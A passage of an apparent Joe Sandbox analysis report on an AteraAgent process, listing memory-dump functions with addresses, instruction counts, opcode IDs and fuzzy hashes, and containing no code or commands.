                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794494612.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b6f0000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d3093ca1b049bd799b1e7caafdffa41901d94ee8791b2cfbcff08ed46da64a3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 87a4eff91926d8ab81c17cc33222074c1a279897fea737febe9863e4f7ab6135
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d3093ca1b049bd799b1e7caafdffa41901d94ee8791b2cfbcff08ed46da64a3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDA1D471B0EB894FD766DB6C98655247FE1EF5A710B0601FBD49ACB2A3DE18BC028341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60D7BE Relevance: .3, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ee184aaf43384ad861a3a35e0b925c96f8af347a0fdcdf59cb18415e88ee1c48
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 757ffe810394f8b4423039c175ff2e59937c54bdaea6b3ffc3a26b73e03ce262
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee184aaf43384ad861a3a35e0b925c96f8af347a0fdcdf59cb18415e88ee1c48
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAB1B370A08A5D8FDF94EF68C894BA8B7F1FF69301F1141AAD00DE7265DB74A981CB40
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60337D Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 016cc79cac055654cd39141d29df6782f76853f7af1622703f22fed5ede66db9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 144e1225e6ef800f61be529e4336525bcecc06702745b44c4d21e1574cfd2089
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 016cc79cac055654cd39141d29df6782f76853f7af1622703f22fed5ede66db9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA17E30A09A1D8FEBA9DB69C4507A877B1FF5A301F1141BEC05DEB2A1CF75A985CB01
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B601B2F Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: df01711f82940c079e9b05be98041b26325ae90e06ea66c60b036212134ebb46
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8ef20d039668de8a852f12ffe3fffb018992cf86c10467bf9d1813c86fb5510
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df01711f82940c079e9b05be98041b26325ae90e06ea66c60b036212134ebb46
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41A13B30A0962C8FEBA5DF29C8947E9B7B1EF5A305F1040E9D05DE7295CA74AE85CF00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60946C Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e51ee6b06de82fe9a1d924e964d4ff8a0719e4c218f0affd7c0cba8788915e3e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c693f231d1da827d5e9c39de72d21bb24b286d92acd9e36ce0931f8a5b3c3de5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51ee6b06de82fe9a1d924e964d4ff8a0719e4c218f0affd7c0cba8788915e3e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F519431918A4C8FDB68DB58D855BE9BBF1FF59310F0082AAD04DD3296DE34A985CF81
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6059E8 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70466ff5f82b470fa7020266b272c57d4a49cda3b35eeac7e4e3de47677453c2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ee615cca2f7604daa90e601b2a6a65a126117694f526a2404216c407de03bfc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70466ff5f82b470fa7020266b272c57d4a49cda3b35eeac7e4e3de47677453c2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D512E31E0E64E4FE769DF6588A11A83BD0EF47351F1500BED0A9CF1E2EB18B9058752
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6F04DE Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794494612.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b6f0000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c72c26ef9f994ca53c24c8624c8b1e1270efe3e2ff22f00f26727edcbe9d523f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b24bd31d976a8f7df3cbaedb89a38d39540ba6e41f457a8142002b02fbfb077e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c72c26ef9f994ca53c24c8624c8b1e1270efe3e2ff22f00f26727edcbe9d523f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7412B62B0EBC94FE7929B7C48665607FE1EF6661030A01FBD099CB2B7DD58AC46C341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60E6D9 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 749eda73b43e16bb7809e197d71712a8641bd415c46103ecf987906d1f03b899
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 726450741f38a553755198bbaf2a2604f1b88fbdfeb86dedebed5f5e1f8df5d9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 749eda73b43e16bb7809e197d71712a8641bd415c46103ecf987906d1f03b899
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC415B30E0951D8FDB58EF99D860AFEB7B1FF5A300F11146AE05AE72A1CB35A940CB50
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B607A45 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b0da06ca691fb4c92552c01d28ca300f9ae58766b5d48e4f8708fbc430f77d1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 215c51130fb67564adb8ef1638ea85febcf4f47cc14409d2d8ce2dd7a37c2988
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b0da06ca691fb4c92552c01d28ca300f9ae58766b5d48e4f8708fbc430f77d1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C41A730E0A65C8FEB55DFA9C4506ED7BF0FF5A300F1100AAD048DB2A2CB39A945CB51
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60D1FC Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a1d3dc5700132b0e527625ef761de6e6fd63aa06f3204d03907cc1356eef6d9f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d1a0108fa296fcf47b7a50d8b933a1eb382d0bfb9254686c5d650234d8c0560c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d3dc5700132b0e527625ef761de6e6fd63aa06f3204d03907cc1356eef6d9f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F410830E09A1DDFDB94EBA9C460AACB7B1FF5A300F510179D559DB2A1DB34B981CB00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6082F8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b07102fc92b921cf28d8171077b424d44a6471f5b147d90052fd41108f8df872
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e580fab3fe3e42aba984fcf9f5b68364b4aed56e0774384deec42bd1838b7667
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b07102fc92b921cf28d8171077b424d44a6471f5b147d90052fd41108f8df872
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C315E70A0AA5D8FEBA8DB69C4607E877B1FF5A301F5100AAD04DD7291DF356985CB00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B607C51 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b1ff566e3a34ed3862ff5f5b4bc7b830ad99a94c8660956c3a25439553b22b24
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 534b8024ab98c45f57d0070f7689b525d94ace624b110df0186b3d8c4615fe1d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1ff566e3a34ed3862ff5f5b4bc7b830ad99a94c8660956c3a25439553b22b24
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D31D331A0AA5C8FEB91DF69C8506ED7BF0FF4A300F1441AAD048DB2A2CB39A945C751
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B604EFA Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8235f6d041477441560f2f41699442731e0a777606fed88503ab51ef0a8433c4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: af257cb22fc03f668dc2e4d00a6893500a4a73f332dad9fcfe7582a7e593f51f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8235f6d041477441560f2f41699442731e0a777606fed88503ab51ef0a8433c4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7221E532A0E79D0FD725EF69D8615E67BB0FF86210B0501BBD1A8C71A3CD24A906C791
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B607DC1 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 90cf807454301f5c19ba9b00b785719542bd4f93eff7d69631cbcc0cde1b7eca
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9e48d65b7a267def2730ef4f93b7d876e23e5903eba7814edd0fcb84ea5a34d9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90cf807454301f5c19ba9b00b785719542bd4f93eff7d69631cbcc0cde1b7eca
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06214C30E19A5D8FEB91EBA8C855AEDBBF0FF59304F000076E008E7296DB34A841CB41
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6049F1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2b0598bb0306fe663cae7607f137cdd065a827870027ea0fdfb77b10966901fa
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 682bdc5297f43b3386606a0a8d8fc7af4cf52abc0046c4c409539aabf56c6e4f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b0598bb0306fe663cae7607f137cdd065a827870027ea0fdfb77b10966901fa
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C11EF3120664D8FDBA5EF65C450AA577A2FF8A305B6244A9D05DCB256CE36AC42C701
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B603B7D Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a2ff412606ba75f225df6d2ac5d6e741d9798fb62d67d7f16d7753a094025cac
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 08e588e7c300be3f56f792feceac1f364369cec3d260a0612500c89a80cbacd8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2ff412606ba75f225df6d2ac5d6e741d9798fb62d67d7f16d7753a094025cac
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E119E31E09A4D8FEB549BA5C8656EABBB0EF4A301F0101A9E119EB1D2CB6865488B41
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60483D Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6cb18f3aa1c50c2633e774080e2a40f1ed86c5df3d98a1d3549fc6e6322c7863
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b0339ffffeef4472bd215930116aef7ff86ce449d60bac0a9edc76d4619d99e7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cb18f3aa1c50c2633e774080e2a40f1ed86c5df3d98a1d3549fc6e6322c7863
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17110C32A0D6DE4FD724EF6998B11F93B60EF42314F0505BAE4AC8B0E3DE28A5558340
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60D132 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9591b75b45fbb150a7beac5b8f3c4b6808fd1e342367e06284d2c8d55e5b8244
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2bbd295c86d516a5a895ff9eff441a785606c2b35fcfaf53981b02b6689a2304
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9591b75b45fbb150a7beac5b8f3c4b6808fd1e342367e06284d2c8d55e5b8244
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2119530A1991CCFDF94EF99D494AECBBB1FF5A301F5500AAE019E7261CB35A841CB50
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6047FA Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f2d43af62ab15e48410335f02b621236cbbed0b9c49ce6d959f50298c69c240c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d6cb84657d44fd822c488ce0d0bcc094d382d08ec26a721402c1bcf6445d7550
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2d43af62ab15e48410335f02b621236cbbed0b9c49ce6d959f50298c69c240c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA019632A0F9CA5FE775DBA548241B976A0FF56201B5904BED4BC8B0A3D915FE05C280
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6052B5 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3075c4f0cc446113d5c5e131292968f7f34c8b251fd10711e493e2a349132c63
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ce7106dc9d9c9b0a85f3bd03bc18f19fed7265df29278bd94749883a65ca3c6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3075c4f0cc446113d5c5e131292968f7f34c8b251fd10711e493e2a349132c63
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2801263160EB880FD356AB34C8299A17FF0EF9724030A05FBC449CF1B3D929A946C381
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B604B60 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dab39d1d87553a3f458377a6e31628a72271db21085c01a1bf842812a0c444b7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c9a9724fa12048240668849b2ddffd49d03d31404ac1149a64d1f77b76218df3
